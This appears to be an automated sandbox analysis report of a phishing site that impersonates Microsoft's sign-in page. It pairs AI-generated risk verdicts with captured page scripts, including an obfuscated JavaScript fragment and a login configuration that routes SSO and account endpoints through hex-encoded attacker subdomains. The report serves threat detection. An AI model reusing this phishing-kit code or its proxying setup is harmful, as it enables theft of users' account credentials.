h(i,j)},'sZubA':function(h,i,j){return h(i,j)},'QwSmI':function(h,i,j){return h(i,j)},'HDYbj':function(h,i,j){return h(i,j)},'BSeqN':function(h,i){return h!==i},'NorfS':gK(1205),'iWWMM':function(h,i){return h<i},'sjCTz':function(h,i){return h(i)},'Cgzkx':function(h,i){return h|i},'GepNw':function(h,i){return i|h},'zmCQK':function(h,i){return i&h},'wnrEO':function(h,i){return h-i},'cokbN':function(h,i){return h<i},'aQLXl':function(h,i){return h<<i},'Cwfdq':function(h,i){return i&h},'fhkNn':function(h,i){return h-i},'xqcqc':function(h,i){return 
h==i |
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://login.borlsfx.com/844b56ecfd?nxx=766771764... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it includes some legitimate functionality like analytics and telemetry, it also interacts with external domains and uses obfuscated URLs, which raises moderate concerns. Additional context is needed to determine the overall intent and potential risks."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msftauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?login_hint=test%40test.com\u0026mkt=\u0026client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://login.borlsfx.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/{0}/winauth/sso?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2","iwaSsoProbeUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/{0}/winauth/ssoprobe?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2","iwaIFrameUrlFormat":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/{0}/winauth/iframe?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://6175746f6c6f676f6e2e6d6963726f736f6674617a75726561642d73736f2e6.borlsfx.com/common/winauth/sso/edgeredirect?client-request-id=4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,
"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":2001,"hpgact":2101,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFe3nJXtqBpAKW9IWJqrEAhaMguKNokinMRZNZp6kmJsMjWgd2j7SbSzvO4Wgep6d7uYZ8OJVOmyGJvScbs0Y0WMCs5UDWIJ4w--r13hFKhgFW8ISMFUgcopYOeCydaNSY7w1qjGMpXBGuTZQBTVqjxefSJPQjUqKU7cL2aoqeZW7lGaWllECk81zb1TtZZtnrS6WY-K-fRM6H_BoIUxOupLSAA","canary":"7SKMT22qThXSIb3L/ZhVSEK/mlIR+bpoeS1/blhbM/0=6:1:CANARY:W4edE1W/Fuu7c73W+RoHrwJ7BpRnbMV1KVMc1XndNFE=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"4e6ce77e-9a41-46e0-b0f7-a2dd61bb9ec2","sessionId":"31a21cd3-b708-4f93-a0e8-735ce1bf1300","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://login.borlsfx.com/common/instrumentation/reportpageload","dssostatus":"https://login.borlsfx.com/common/instrumentation/dssostatus"}},"browser":{"ltr":1,"Chrome":1,"_Win":1,"_M117":1,"_D0":1,"Full":1,"Win81":1,"RE_WebKit":1,"b":{"name":"Chrome","major":117,"minor":0},"os":{"name":"Windows","version":"10.0"},"V":"117.0"},"watson":{"url":"/common/handlers/watson","bundle":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js","sbundle":"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/watsonsupportwithjquery.3.5.min_dc940oomzau4rsu8qesnvg2.js","fbundle":"https://aadcdn.msfta |
URL: https://login.borlsfx.com/844b56ecfd?nxx=766771764... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script exhibits several high-risk behaviors, including:
- Dynamic code execution through the use of obfuscated URLs and encoded strings, which could be used to execute remote or malicious code.
- Data exfiltration by sending user data (potentially including sensitive information like cookies or session identifiers) to external, untrusted domains.
- Redirects to suspicious domains, which could be used for phishing or other malicious activities.
The combination of these high-risk indicators suggests this script is likely malicious and poses a significant security risk."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASOftZ72jHRw2sF79dTke-P881i5IzPySwDq1zFqEzYOP0LjIwvGBknMfGWpBaXOIAIkPAtJkH_onTPlPBit9SU1KLEksz8vAssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbri1nbW928_ePi0LahjrnpuynCKVd882Ns3xMioMCQjItgzydhHPyojLNjVWz83xzNIO6kgPzXYUD8pJyPJV9_A1tTKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EHX8eimw8PXzv-zuMVv45bYmpSmmmuW2Z6RWSBtra2e4CziXmIhWFlWqV5SHpIlLl-SWZxaUl6VWSx7QYBhgcCDAA1\u0026login_hint=test%40test.com\u0026estsfed=1\u0026uaid=e52ef3c591884a48a80df5ca59efc70e\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com","urlMsaLogout":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/logout.srf?iframed_by=https%3a%2f%2flogin.microsoftonline.com","urlOtherIdpForget":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/forgetme.srf?iframed_by=https%3a%2f%2flogin.microsoftonline.com","showCantAccessAccountLink":true,"urlGitHubFed":"https://6c6f67696e2e6c6976652e636f6d.borlsfx.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASOftZ72jHRw2sF79dTke-P881i5IzPySwDq1zFqEzYOP0LjIwvGBknMfGWpBaXOIAIkPAtJkH_onTPlPBit9SU1KLEksz8vAssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbri1nbW928_ePi0LahjrnpuynCKVd882Ns3xMioMCQjItgzydhHPyojLNjVWz83xzNIO6kgPzXYUD8pJyPJV9_A1tTKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EHX8eimw8PXzv-zuMVv45bYmpSmmmuW2Z6RWSBtra2e
4CziXmIhWFlWqV5SHpIlLl-SWZxaUl6VWSx7QYBhgcCDAA1\u0026login_hint=test%40test.com\u0026estsfed=1\u0026uaid=e52ef3c591884a48a80df5ca59efc70e\u0026fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com\u0026idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350! |
URL: https://aadcdn.msftauth.net/shared/1.0/content/js/... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. It does not exhibit any high-risk behaviors like dynamic code execution, data exfiltration, or suspicious redirects. The code is also accompanied by a third-party notice, indicating it is likely part of a larger, well-documented project. While the script uses some legacy practices like `XDomainRequest`, these pose only minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a standard web API, with no clear signs of malicious intent."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.com/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else 
a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var |
URL: https://login.borlsfx.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.borlsfx.com |
URL: https://login.borlsfx.com/844b56ecfd?nxx=766771764... Model: Joe Sandbox AI |
{
"risk_score": 2,
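"reasoning": "The script primarily involves DOM manipulation and logging functionality, with no high-risk indicators like dynamic code execution or data exfiltration. It uses aggressive DOM manipulation techniques, which is a moderate-risk indicator, but there are no signs of malicious intent or interaction with suspicious domains. One detail in the excerpt deserves a closer look: the loader sets attributes named rickorigin and xintegrity on the script and stylesheet elements it creates, presumably in place of crossorigin and integrity, and since neither name is a standard HTML attribute the browser would apply no subresource-integrity check to those resources."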
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Tired of seeing this? Rename your personal Microsoft account.",
"prominent_button_name": "Sign in with another account",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Tired of seeing this? Rename your personal Microsoft account.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.borlsfx.com/844b56ecfd?nxx=7667717642766771762c616d6f236c4d&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://borlsfx.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://borlsfx.com |